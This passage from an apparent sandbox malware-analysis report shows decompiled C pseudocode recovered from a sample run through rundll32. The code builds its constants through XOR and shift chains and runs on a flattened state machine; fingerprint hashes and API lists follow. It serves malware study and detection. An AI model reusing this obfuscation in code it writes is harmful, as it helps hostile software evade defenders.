                                                                                                                                    									_t90 =  &_v552; // 0xeb41e563
                                                                                                                                    									_t111 = E002C9B83(_t133, __eflags, _v544,  *_t90,  &_v520, _v524);
                                                                                                                                    									_t136 =  &(_t136[4]);
                                                                                                                                    									__eflags = _t111;
                                                                                                                                    									if(__eflags != 0) {
                                                                                                                                    										_t118 = 0x7ac597b;
                                                                                                                                    										continue;
                                                                                                                                    									}
                                                                                                                                    								} else {
                                                                                                                                    									if(_t118 == 0x96d401d) {
                                                                                                                                    										_t115 = E002C52C2();
                                                                                                                                    										_t133 = _t115;
                                                                                                                                    										__eflags = _t115;
                                                                                                                                    										if(__eflags != 0) {
                                                                                                                                    											_t118 = 0x80b0e4e;
                                                                                                                                    											continue;
                                                                                                                                    										}
                                                                                                                                    									} else {
                                                                                                                                    										if(_t118 != 0xa7595e6) {
                                                                                                                                    											goto L15;
                                                                                                                                    										} else {
                                                                                                                                    											_t135 = E002C2051(_v532, _t117, _v528);
                                                                                                                                    											_t118 = 0x27fe330;
                                                                                                                                    											continue;
                                                                                                                                    										}
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						goto L16;
                                                                                                                                    					}
                                                                                                                                    					_v564 = 0x69bdc3;
                                                                                                                                    					_v564 = _v564 | 0xfd1bce6c;
                                                                                                                                    					_v564 = _v564 ^ 0xf153ffb6;
                                                                                                                                    					_v564 = _v564 ^ 0x260f00bb;
                                                                                                                                    					__eflags = _t135 - _v564;
                                                                                                                                    					_t134 =  ==  ? 1 : _t134;
                                                                                                                                    					_t118 = 0x8b668cc;
                                                                                                                                    					L15:
                                                                                                                                    					__eflags = _t118 - 0x8b668cc;
                                                                                                                                    				} while (__eflags != 0);
                                                                                                                                    				L16:
                                                                                                                                    				return _t134;
                                                                                                                                    			}

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: <~)$`/&$cA$m9
                                                                                                                                    • API String ID: 0-2671356241
                                                                                                                                    • Opcode ID: 0357c323211fbb2750b6ff63dd811012db8b592bb5a4c14c508bc9731e28ab86
                                                                                                                                    • Instruction ID: d25da1b1ef089132ec5729b49e4b050a5cfd40e0938d991f5338783c5d86e95b
                                                                                                                                    • Opcode Fuzzy Hash: 0357c323211fbb2750b6ff63dd811012db8b592bb5a4c14c508bc9731e28ab86
                                                                                                                                    • Instruction Fuzzy Hash: 135175710183029FC388CE21D49542BBBE2FFD8758F501E1EF5A692260C7B4CA998F93
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                    			E002C9B83(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                    				unsigned int _v8;
                                                                                                                                    				signed int _v12;
                                                                                                                                    				signed int _v16;
                                                                                                                                    				signed int _v20;
                                                                                                                                    				signed int _v24;
                                                                                                                                    				signed int _v28;
                                                                                                                                    				signed int _v32;
                                                                                                                                    				signed int _v36;
                                                                                                                                    				signed int _v40;
                                                                                                                                    				signed int _v44;
                                                                                                                                    				signed int _v48;
                                                                                                                                    				char _v52;
                                                                                                                                    				void* _v64;
                                                                                                                                    				intOrPtr _v68;
                                                                                                                                    				void* _t115;
                                                                                                                                    				signed int _t130;
                                                                                                                                    				signed int _t131;
                                                                                                                                    				void* _t133;
                                                                                                                                    
                                                                                                                                    				_push(_a16);
                                                                                                                                    				_push(_a12);
                                                                                                                                    				_v52 = 0x104;
                                                                                                                                    				_push(_a8);
                                                                                                                                    				_push(_a4);
                                                                                                                                    				_push(0x104);
                                                                                                                                    				_push(__ecx);
                                                                                                                                    				E002D20B9(0x104);
                                                                                                                                    				_v68 = 0x342964;
                                                                                                                                    				asm("stosd");
                                                                                                                                    				_t133 = 0;
                                                                                                                                    				asm("stosd");
                                                                                                                                    				asm("stosd");
                                                                                                                                    				_v40 = 0xa3a3c;
                                                                                                                                    				_v40 = _v40 + 0x2c25;
                                                                                                                                    				_v40 = _v40 ^ 0x000a7661;
                                                                                                                                    				_v16 = 0x75ee44;
                                                                                                                                    				_t130 = 0x7a;
                                                                                                                                    				_v16 = _v16 / _t130;
                                                                                                                                    				_v16 = _v16 ^ 0xc9e42672;
                                                                                                                                    				_v16 = _v16 ^ 0xc9e58a7e;
                                                                                                                                    				_v8 = 0x386b92;
                                                                                                                                    				_v8 = _v8 << 4;
                                                                                                                                    				_v8 = _v8 | 0x0ec9a536;
                                                                                                                                    				_v8 = _v8 >> 0xf;
                                                                                                                                    				_v8 = _v8 ^ 0x000b4478;
                                                                                                                                    				_v44 = 0xd66787;
                                                                                                                                    				_v44 = _v44 >> 3;
                                                                                                                                    				_v44 = _v44 ^ 0x001d593f;
                                                                                                                                    				_v24 = 0x7c5a73;
                                                                                                                                    				_v24 = _v24 | 0xae316990;
                                                                                                                                    				_t131 = 0x19;
                                                                                                                                    				_v24 = _v24 / _t131;
                                                                                                                                    				_v24 = _v24 ^ 0x06f0967a;
                                                                                                                                    				_v20 = 0x3dfd52;
                                                                                                                                    				_v20 = _v20 >> 8;
                                                                                                                                    				_v20 = _v20 * 0x24;
                                                                                                                                    				_v20 = _v20 ^ 0x0009affd;
                                                                                                                                    				_v12 = 0xf0c6a5;
                                                                                                                                    				_v12 = _v12 + 0xffff2be4;
                                                                                                                                    				_v12 = _v12 + 0x1686;
                                                                                                                                    				_v12 = _v12 << 2;
                                                                                                                                    				_v12 = _v12 ^ 0x03c3840c;
                                                                                                                                    				_v48 = 0x30c967;
                                                                                                                                    				_v48 = _v48 | 0xcae095b2;
                                                                                                                                    				_v48 = _v48 ^ 0xcaf7f966;
                                                                                                                                    				_v36 = 0xabcbdc;
                                                                                                                                    				_v36 = _v36 + 0xfffff856;
                                                                                                                                    				_v36 = _v36 | 0xb2b71321;
                                                                                                                                    				_v36 = _v36 ^ 0xb2b3c312;
                                                                                                                                    				_v32 = 0xda8dbe;
                                                                                                                                    				_v32 = _v32 + 0xffff364b;
                                                                                                                                    				_v32 = _v32 | 0x02598b37;
                                                                                                                                    				_v32 = _v32 ^ 0x02d31c0a;
                                                                                                                                    				_v28 = 0x528ee8;
                                                                                                                                    				_v28 = _v28 * 0x12;
                                                                                                                                    				_v28 = _v28 << 2;
                                                                                                                                    				_v28 = _v28 ^ 0x17383776;
                                                                                                                                    				_t115 = E002C91DD(__ecx, _v40, __ecx);
                                                                                                                                    				_t132 = _t115;
                                                                                                                                    				if(_t115 != 0) {
                                                                                                                                    					_t133 = E002C76AA(_a12,  &_v52, _v44, _v24, __ecx, _v20, _t132, _v12);
                                                                                                                                    					E002D1E67(_v48, _v36, _v32, _v28, _t132);
                                                                                                                                    				}
                                                                                                                                    				return _t133;
                                                                                                                                    			}






















                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Du$av$d)4$sZ|
                                                                                                                                    • API String ID: 0-269012183
                                                                                                                                    • Opcode ID: dfc967cf0c468e8d72dd3f4d8ef6424ad64969c011c2b846f478a6ab0dae1b6b
                                                                                                                                    • Instruction ID: d80c5bd3bcfd5ae228ac4c968ced1ad257daedf2d7e1df5ac21b077cfa88f58e
                                                                                                                                    • Opcode Fuzzy Hash: dfc967cf0c468e8d72dd3f4d8ef6424ad64969c011c2b846f478a6ab0dae1b6b
                                                                                                                                    • Instruction Fuzzy Hash: A95112B1D00209EBDF09DFE5C94A8EEBBB1FB48318F108159E412B6260D3B55A58DFA0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • GetThreadLocale.KERNEL32 ref: 10043743
                                                                                                                                    • GetLocaleInfoA.KERNEL32(00000000,00001004,?,00000007), ref: 10043755
                                                                                                                                    • GetACP.KERNEL32 ref: 1004377E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Locale$InfoThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4232894706-0
                                                                                                                                    • Opcode ID: 138607bedea967b7fe84d9a3997690d852697f2840ddf7cd3550f999a21f7b57
                                                                                                                                    • Instruction ID: 788673dfdacf9fce6eb7172e6dd538a5e2a4211a9e61a4e82855ee0bc522c5dc
                                                                                                                                    • Opcode Fuzzy Hash: 138607bedea967b7fe84d9a3997690d852697f2840ddf7cd3550f999a21f7b57
                                                                                                                                    • Instruction Fuzzy Hash: 8AF0C871E04238ABE715DBA489955EFB7E4EB09A81B11816CD981E7251EA206D0487C9
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • Opcode ID: fb0f3e1e5a18f2ff69a806334b974a9f52d4ac6ab5fd56aeff2c93c24eadb245
                                                                                                                                    • Instruction ID: 3e933570e0ddfcbf732aafa8bdad2c1db21bb76b11c706ff9f14b0ef8e609435
                                                                                                                                    • Opcode Fuzzy Hash: fb0f3e1e5a18f2ff69a806334b974a9f52d4ac6ab5fd56aeff2c93c24eadb245
                                                                                                                                    • Instruction Fuzzy Hash: 63F03731505119EBDF01DF70CD48AAE3FA9FB04284F008020FD09D9060EB31EB95EBA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                    			E002D0E53(void* __ecx) {
                                                                                                                                    				char _v520;
                                                                                                                                    				char _v1040;
                                                                                                                                    				char _v1560;
                                                                                                                                    				char _v2080;
                                                                                                                                    				char _v2600;
                                                                                                                                    				signed int _v2604;
                                                                                                                                    				signed int _v2608;
                                                                                                                                    				signed int _v2612;
                                                                                                                                    				signed int _v2616;
                                                                                                                                    				signed int _v2620;
                                                                                                                                    				signed int _v2624;
                                                                                                                                    				signed int _v2628;
                                                                                                                                    				signed int _v2632;
                                                                                                                                    				signed int _v2636;
                                                                                                                                    				signed int _v2640;
                                                                                                                                    				signed int _v2644;
                                                                                                                                    				signed int _v2648;
                                                                                                                                    				signed int _v2652;
                                                                                                                                    				signed int _v2656;
                                                                                                                                    				signed int _v2660;
                                                                                                                                    				signed int _v2664;
                                                                                                                                    				signed int _v2668;
                                                                                                                                    				signed int _v2672;
                                                                                                                                    				signed int _v2676;
                                                                                                                                    				signed int _v2680;
                                                                                                                                    				signed int _v2684;
                                                                                                                                    				signed int _v2688;
                                                                                                                                    				signed int _v2692;
                                                                                                                                    				signed int _v2696;
                                                                                                                                    				signed int _v2700;
                                                                                                                                    				signed int _v2704;
                                                                                                                                    				signed int _v2708;
                                                                                                                                    				signed int _v2712;
                                                                                                                                    				signed int _v2716;
                                                                                                                                    				signed int _v2720;
                                                                                                                                    				signed int _v2724;
                                                                                                                                    				signed int _v2728;
                                                                                                                                    				signed int _v2732;
                                                                                                                                    				signed int _v2736;
                                                                                                                                    				signed int _v2740;
                                                                                                                                    				signed int _v2744;
                                                                                                                                    				signed int _v2748;
                                                                                                                                    				signed int _v2752;
                                                                                                                                    				signed int _v2756;
                                                                                                                                    				signed int _v2760;
                                                                                                                                    				signed int _v2764;
                                                                                                                                    				signed int _v2768;
                                                                                                                                    				signed int _v2772;
                                                                                                                                    				signed int _t406;
                                                                                                                                    				signed int _t426;
                                                                                                                                    				signed int _t427;
                                                                                                                                    				signed int _t428;
                                                                                                                                    				signed int _t429;
                                                                                                                                    				signed int _t430;
                                                                                                                                    				signed int _t435;
                                                                                                                                    				void* _t467;
                                                                                                                                    				void* _t468;
                                                                                                                                    				signed int* _t472;
                                                                                                                                    
                                                                                                                                    				_t472 =  &_v2772;
                                                                                                                                    				_v2700 = 0xd36ba7;
                                                                                                                                    				_v2700 = _v2700 << 7;
                                                                                                                                    				_v2700 = _v2700 ^ 0xaed70c65;
                                                                                                                                    				_v2700 = _v2700 ^ 0xc762dfcc;
                                                                                                                                    				_v2652 = 0x6f4609;
                                                                                                                                    				_t9 =  &_v2652; // 0x6f4609
                                                                                                                                    				_v2652 =  *_t9 * 0x1c;
                                                                                                                                    				_t467 = __ecx;
                                                                                                                                    				_v2652 = _v2652 ^ 0x0c23569d;
                                                                                                                                    				_t468 = 0xea1969c;
                                                                                                                                    				_v2608 = 0xb8394b;
                                                                                                                                    				_v2608 = _v2608 + 0xaeb5;
                                                                                                                                    				_v2608 = _v2608 ^ 0x00b390c3;
                                                                                                                                    				_v2736 = 0x3d33f1;
                                                                                                                                    				_v2736 = _v2736 + 0xffffd537;
                                                                                                                                    				_v2736 = _v2736 + 0xffffb6ee;
                                                                                                                                    				_v2736 = _v2736 + 0xbad8;
                                                                                                                                    				_v2736 = _v2736 ^ 0x003e0409;
                                                                                                                                    				_v2768 = 0xd1d4ce;
                                                                                                                                    				_v2768 = _v2768 >> 0xc;
                                                                                                                                    				_v2768 = _v2768 ^ 0xb5c37fe4;
                                                                                                                                    				_v2768 = _v2768 + 0x4eb3;
                                                                                                                                    				_v2768 = _v2768 ^ 0xb5c2c9c4;
                                                                                                                                    				_v2760 = 0x157bbd;
                                                                                                                                    				_v2760 = _v2760 ^ 0x6d7617e7;
                                                                                                                                    				_v2760 = _v2760 ^ 0x1b56cd2f;
                                                                                                                                    				_v2760 = _v2760 ^ 0xfb63426d;
                                                                                                                                    				_v2760 = _v2760 ^ 0x8d577604;
                                                                                                                                    				_v2604 = 0x1fac8b;
                                                                                                                                    				_v2604 = _v2604 + 0x9962;
                                                                                                                                    				_v2604 = _v2604 ^ 0x0029d956;
                                                                                                                                    				_v2696 = 0x3d46b4;
                                                                                                                                    				_v2696 = _v2696 | 0x3d7fd3ff;
                                                                                                                                    				_v2696 = _v2696 ^ 0x3d7bd02d;
                                                                                                                                    				_v2720 = 0xad1695;
                                                                                                                                    				_t426 = 9;
                                                                                                                                    				_v2720 = _v2720 * 0x4b;
                                                                                                                                    				_v2720 = _v2720 >> 0x10;
                                                                                                                                    				_v2720 = _v2720 << 0xe;
                                                                                                                                    				_v2720 = _v2720 ^ 0x0cab1f79;
                                                                                                                                    				_v2644 = 0xe14118;
                                                                                                                                    				_v2644 = _v2644 ^ 0x82369820;
                                                                                                                                    				_v2644 = _v2644 ^ 0x82de8a4e;
                                                                                                                                    				_v2668 = 0x391c30;
                                                                                                                                    				_v2668 = _v2668 >> 7;
                                                                                                                                    				_v2668 = _v2668 + 0xffff3589;
                                                                                                                                    				_v2668 = _v2668 ^ 0xfff6d862;
                                                                                                                                    				_v2692 = 0x9dbc3;
                                                                                                                                    				_v2692 = _v2692 << 8;
                                                                                                                                    				_v2692 = _v2692 * 0x75;
                                                                                                                                    				_v2692 = _v2692 ^ 0x81749ad9;
                                                                                                                                    				_v2660 = 0x144a46;
                                                                                                                                    				_v2660 = _v2660 >> 0xd;
                                                                                                                                    				_v2660 = _v2660 ^ 0x0008b8c7;
                                                                                                                                    				_v2752 = 0x703c03;
                                                                                                                                    				_v2752 = _v2752 * 0x74;
                                                                                                                                    				_v2752 = _v2752 ^ 0x2e54cb21;
                                                                                                                                    				_v2752 = _v2752 | 0x6f17e683;
                                                                                                                                    				_v2752 = _v2752 ^ 0x7f96e2f0;
                                                                                                                                    				_v2676 = 0xa438e5;
                                                                                                                                    				_v2676 = _v2676 / _t426;
                                                                                                                                    				_v2676 = _v2676 + 0x92ff;
                                                                                                                                    				_v2676 = _v2676 ^ 0x0015b827;
                                                                                                                                    				_v2612 = 0x1c48b9;
                                                                                                                                    				_t427 = 0x1a;
                                                                                                                                    				_v2612 = _v2612 / _t427;
                                                                                                                                    				_v2612 = _v2612 ^ 0x000154fb;
                                                                                                                                    				_v2628 = 0x490198;
                                                                                                                                    				_v2628 = _v2628 | 0x561f6486;
                                                                                                                                    				_v2628 = _v2628 ^ 0x565ec1b9;
                                                                                                                                    				_v2616 = 0xcec4ed;
                                                                                                                                    				_t428 = 0x3d;
                                                                                                                                    				_v2616 = _v2616 * 9;
                                                                                                                                    				_v2616 = _v2616 ^ 0x074f393e;
                                                                                                                                    				_v2636 = 0x4be85b;
                                                                                                                                    				_v2636 = _v2636 >> 1;
                                                                                                                                    				_v2636 = _v2636 ^ 0x002afd34;
                                                                                                                                    				_v2728 = 0xca47ed;
                                                                                                                                    				_v2728 = _v2728 << 1;
                                                                                                                                    				_v2728 = _v2728 / _t428;
                                                                                                                                    				_v2728 = _v2728 >> 3;
                                                                                                                                    				_v2728 = _v2728 ^ 0x00084593;
                                                                                                                                    				_v2620 = 0x793301;
                                                                                                                                    				_v2620 = _v2620 | 0xccc0d5da;
                                                                                                                                    				_v2620 = _v2620 ^ 0xccf56683;
                                                                                                                                    				_v2684 = 0xd6c9e7;
                                                                                                                                    				_v2684 = _v2684 >> 8;
                                                                                                                                    				_v2684 = _v2684 + 0x30fc;
                                                                                                                                    				_v2684 = _v2684 ^ 0x000dbf27;
                                                                                                                                    				_v2656 = 0x6cf887;
                                                                                                                                    				_v2656 = _v2656 | 0x54469415;
                                                                                                                                    				_v2656 = _v2656 ^ 0x5469dd96;
                                                                                                                                    				_v2712 = 0x1ba43e;
                                                                                                                                    				_v2712 = _v2712 + 0xffff54b6;
                                                                                                                                    				_v2712 = _v2712 >> 0x10;
                                                                                                                                    				_v2712 = _v2712 ^ 0x536d0b9d;
                                                                                                                                    				_v2712 = _v2712 ^ 0x5368fd88;
                                                                                                                                    				_v2744 = 0x7fa81e;
                                                                                                                                    				_v2744 = _v2744 + 0x45dd;
                                                                                                                                    				_v2744 = _v2744 | 0xcc5c3b14;
                                                                                                                                    				_t429 = 0x76;
                                                                                                                                    				_v2744 = _v2744 * 0x48;
                                                                                                                                    				_v2744 = _v2744 ^ 0x83f6fb81;
                                                                                                                                    				_v2704 = 0x73cce1;
                                                                                                                                    				_v2704 = _v2704 >> 6;
                                                                                                                                    				_v2704 = _v2704 | 0x0e0742c3;
                                                                                                                                    				_v2704 = _v2704 ^ 0x0e0521c8;
                                                                                                                                    				_v2764 = 0x3737a7;
                                                                                                                                    				_v2764 = _v2764 >> 0xb;
                                                                                                                                    				_v2764 = _v2764 << 3;
                                                                                                                                    				_v2764 = _v2764 + 0x14ac;
                                                                                                                                    				_v2764 = _v2764 ^ 0x0004654a;
                                                                                                                                    				_v2772 = 0xaeb57f;
                                                                                                                                    				_v2772 = _v2772 / _t429;
                                                                                                                                    				_v2772 = _v2772 << 0xf;
                                                                                                                                    				_t430 = 0x37;
                                                                                                                                    				_v2772 = _v2772 / _t430;
                                                                                                                                    				_v2772 = _v2772 ^ 0x037ee988;
                                                                                                                                    				_v2648 = 0x954498;
                                                                                                                                    				_t431 = 0x4b;
                                                                                                                                    				_v2648 = _v2648 / _t431;
                                                                                                                                    				_v2648 = _v2648 ^ 0x00054dec;
                                                                                                                                    				_v2640 = 0x8be41e;
                                                                                                                                    				_v2640 = _v2640 >> 0xd;
                                                                                                                                    				_v2640 = _v2640 ^ 0x00089615;
                                                                                                                                    				_v2748 = 0xfabe1b;
                                                                                                                                    				_v2748 = _v2748 ^ 0xff42a680;
                                                                                                                                    				_v2748 = _v2748 + 0xffff8ee7;
                                                                                                                                    				_v2748 = _v2748 + 0x1c5a;
                                                                                                                                    				_v2748 = _v2748 ^ 0xffbaa703;
                                                                                                                                    				_v2756 = 0x33a01d;
                                                                                                                                    				_v2756 = _v2756 * 0x6f;
                                                                                                                                    				_v2756 = _v2756 << 4;
                                                                                                                                    				_v2756 = _v2756 >> 4;
                                                                                                                                    				_v2756 = _v2756 ^ 0x066d94da;
                                                                                                                                    				_v2672 = 0x7cb69f;
                                                                                                                                    				_v2672 = _v2672 << 4;
                                                                                                                                    				_v2672 = _v2672 * 0x4a;
                                                                                                                                    				_v2672 = _v2672 ^ 0x40c5c2d0;
                                                                                                                                    				_v2680 = 0xc0e1f8;
                                                                                                                                    				_v2680 = _v2680 << 1;
                                                                                                                                    				_v2680 = _v2680 | 0xa5ca1830;
                                                                                                                                    				_v2680 = _v2680 ^ 0xa5ca6401;
                                                                                                                                    				_v2732 = 0xd52773;
                                                                                                                                    				_v2732 = _v2732 ^ 0x8b84e9f5;
                                                                                                                                    				_v2732 = _v2732 + 0xffffa58a;
                                                                                                                                    				_v2732 = _v2732 >> 1;
                                                                                                                                    				_v2732 = _v2732 ^ 0x45a69f9f;
                                                                                                                                    				_v2740 = 0x525c84;
                                                                                                                                    				_v2740 = _v2740 * 0x45;
                                                                                                                                    				_v2740 = _v2740 << 0xd;
                                                                                                                                    				_v2740 = _v2740 + 0xffffe485;
                                                                                                                                    				_v2740 = _v2740 ^ 0x5df42895;
                                                                                                                                    				_v2688 = 0x8afd1b;
                                                                                                                                    				_v2688 = _v2688 >> 0xa;
                                                                                                                                    				_v2688 = _v2688 * 0x44;
                                                                                                                                    				_v2688 = _v2688 ^ 0x000c822b;
                                                                                                                                    				_v2632 = 0xb6ec99;
                                                                                                                                    				_v2632 = _v2632 + 0xffff2a9a;
                                                                                                                                    				_v2632 = _v2632 ^ 0x00b1db1a;
                                                                                                                                    				_v2664 = 0xfa37e2;
                                                                                                                                    				_v2664 = _v2664 * 0x4c;
                                                                                                                                    				_v2664 = _v2664 + 0x9251;
                                                                                                                                    				_v2664 = _v2664 ^ 0x4a4e0c53;
                                                                                                                                    				_v2708 = 0xf9311d;
                                                                                                                                    				_v2708 = _v2708 >> 2;
                                                                                                                                    				_t406 = _v2708 * 0x30;
                                                                                                                                    				_v2708 = _t406;
                                                                                                                                    				_v2708 = _v2708 + 0xffffde46;
                                                                                                                                    				_v2708 = _v2708 ^ 0x0bad021b;
                                                                                                                                    				_v2624 = 0x51d14;
                                                                                                                                    				_v2624 = _v2624 | 0x271919e8;
                                                                                                                                    				_v2624 = _v2624 ^ 0x2716653c;
                                                                                                                                    				_v2716 = 0x708eea;
                                                                                                                                    				_v2716 = _v2716 + 0xfffff8d8;
                                                                                                                                    				_v2716 = _v2716 | 0x4ca3cf3c;
                                                                                                                                    				_v2716 = _v2716 ^ 0x396f5f4d;
                                                                                                                                    				_v2716 = _v2716 ^ 0x7599e4cd;
                                                                                                                                    				_v2724 = 0x3acc77;
                                                                                                                                    				_v2724 = _v2724 + 0x56d;
                                                                                                                                    				_v2724 = _v2724 + 0xb0bb;
                                                                                                                                    				_v2724 = _v2724 + 0xffffce89;
                                                                                                                                    				_v2724 = _v2724 ^ 0x003c4612;
                                                                                                                                    				while(_t468 != 0x5de06da) {
                                                                                                                                    					if(_t468 == 0xea1969c) {
                                                                                                                                    						_t468 = 0xfa9128f;
                                                                                                                                    						continue;
                                                                                                                                    					} else {
                                                                                                                                    						_t480 = _t468 - 0xfa9128f;
                                                                                                                                    						if(_t468 != 0xfa9128f) {
                                                                                                                                    							L8:
                                                                                                                                    							__eflags = _t468 - 0xa8e801c;
                                                                                                                                    							if(__eflags != 0) {
                                                                                                                                    								continue;
                                                                                                                                    							}
                                                                                                                                    						} else {
                                                                                                                                    							E002DDA22(_v2652, _v2608, _t480, _v2736,  &_v2600, _t431, _v2768);
                                                                                                                                    							 *((short*)(E002CB6CF( &_v2600, _v2760, _v2604, _v2696))) = 0;
                                                                                                                                    							E002C8969(_v2720,  &_v1560, _t480, _v2644, _v2668);
                                                                                                                                    							_push(_v2752);
                                                                                                                                    							_push(_v2660);
                                                                                                                                    							E002C47CE( &_v2600, _v2676, _v2692, _v2612, _v2628, E002DDCF7(_v2692, 0x2c1308, _t480),  &_v1560, _v2616, _v2636);
                                                                                                                                    							E002CA8B0(_v2728, _t419, _v2620);
                                                                                                                                    							_t431 = _v2684;
                                                                                                                                    							_t406 = E002CEA99(_v2684, _t467, _v2656, _v2712,  &_v2080, _v2744);
                                                                                                                                    							_t472 =  &(_t472[0x17]);
                                                                                                                                    							if(_t406 != 0) {
                                                                                                                                    								_t468 = 0x5de06da;
                                                                                                                                    								continue;
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    					return _t406;
                                                                                                                                    				}
                                                                                                                                    				_push(_v2648);
                                                                                                                                    				_push(_v2700);
                                                                                                                                    				_push(_v2772);
                                                                                                                                    				_push( &_v1040);
                                                                                                                                    				E002D46BB(_v2704, _v2764);
                                                                                                                                    				_push(_v2756);
                                                                                                                                    				_push(_v2748);
                                                                                                                                    				E002C47CE( &_v1040, _v2672, _v2640, _v2680, _v2732, E002DDCF7(_v2640, 0x2c13b8, __eflags),  &_v2080, _v2740, _v2688);
                                                                                                                                    				_t435 = _v2632;
                                                                                                                                    				E002CA8B0(_t435, _t409, _v2664);
                                                                                                                                    				__eflags = 0;
                                                                                                                                    				_push(_v2724);
                                                                                                                                    				_push(0);
                                                                                                                                    				_push(_t435);
                                                                                                                                    				_push(0);
                                                                                                                                    				_push(0);
                                                                                                                                    				_push(_v2716);
                                                                                                                                    				_t431 = _v2708;
                                                                                                                                    				_push( &_v520);
                                                                                                                                    				_t406 = E002CAB87(_v2708, _v2624, 0);
                                                                                                                                    				_t472 = _t472 - 0xc + 0x64;
                                                                                                                                    				_t468 = 0xa8e801c;
                                                                                                                                    				goto L8;
                                                                                                                                    			}





























































                                                                                                                                    0x002d122d
                                                                                                                                    0x002d1235
                                                                                                                                    0x002d1247
                                                                                                                                    0x002d124a
                                                                                                                                    0x002d1251
                                                                                                                                    0x002d125c
                                                                                                                                    0x002d1267
                                                                                                                                    0x002d126f
                                                                                                                                    0x002d127a
                                                                                                                                    0x002d1282
                                                                                                                                    0x002d128a
                                                                                                                                    0x002d1292
                                                                                                                                    0x002d129a
                                                                                                                                    0x002d12a7
                                                                                                                                    0x002d12b9
                                                                                                                                    0x002d12bd
                                                                                                                                    0x002d12c2
                                                                                                                                    0x002d12c7
                                                                                                                                    0x002d12cf
                                                                                                                                    0x002d12d7
                                                                                                                                    0x002d12e1
                                                                                                                                    0x002d12e5
                                                                                                                                    0x002d12ed
                                                                                                                                    0x002d12f5
                                                                                                                                    0x002d12f9
                                                                                                                                    0x002d1301
                                                                                                                                    0x002d1309
                                                                                                                                    0x002d1311
                                                                                                                                    0x002d1319
                                                                                                                                    0x002d1321
                                                                                                                                    0x002d1325
                                                                                                                                    0x002d132d
                                                                                                                                    0x002d133a
                                                                                                                                    0x002d133e
                                                                                                                                    0x002d1343
                                                                                                                                    0x002d134b
                                                                                                                                    0x002d1353
                                                                                                                                    0x002d135b
                                                                                                                                    0x002d1365
                                                                                                                                    0x002d1369
                                                                                                                                    0x002d1371
                                                                                                                                    0x002d137c
                                                                                                                                    0x002d1387
                                                                                                                                    0x002d1392
                                                                                                                                    0x002d139f
                                                                                                                                    0x002d13a3
                                                                                                                                    0x002d13ab
                                                                                                                                    0x002d13b3
                                                                                                                                    0x002d13bb
                                                                                                                                    0x002d13c0
                                                                                                                                    0x002d13c5
                                                                                                                                    0x002d13c9
                                                                                                                                    0x002d13d1
                                                                                                                                    0x002d13d9
                                                                                                                                    0x002d13e4
                                                                                                                                    0x002d13ef
                                                                                                                                    0x002d13fa
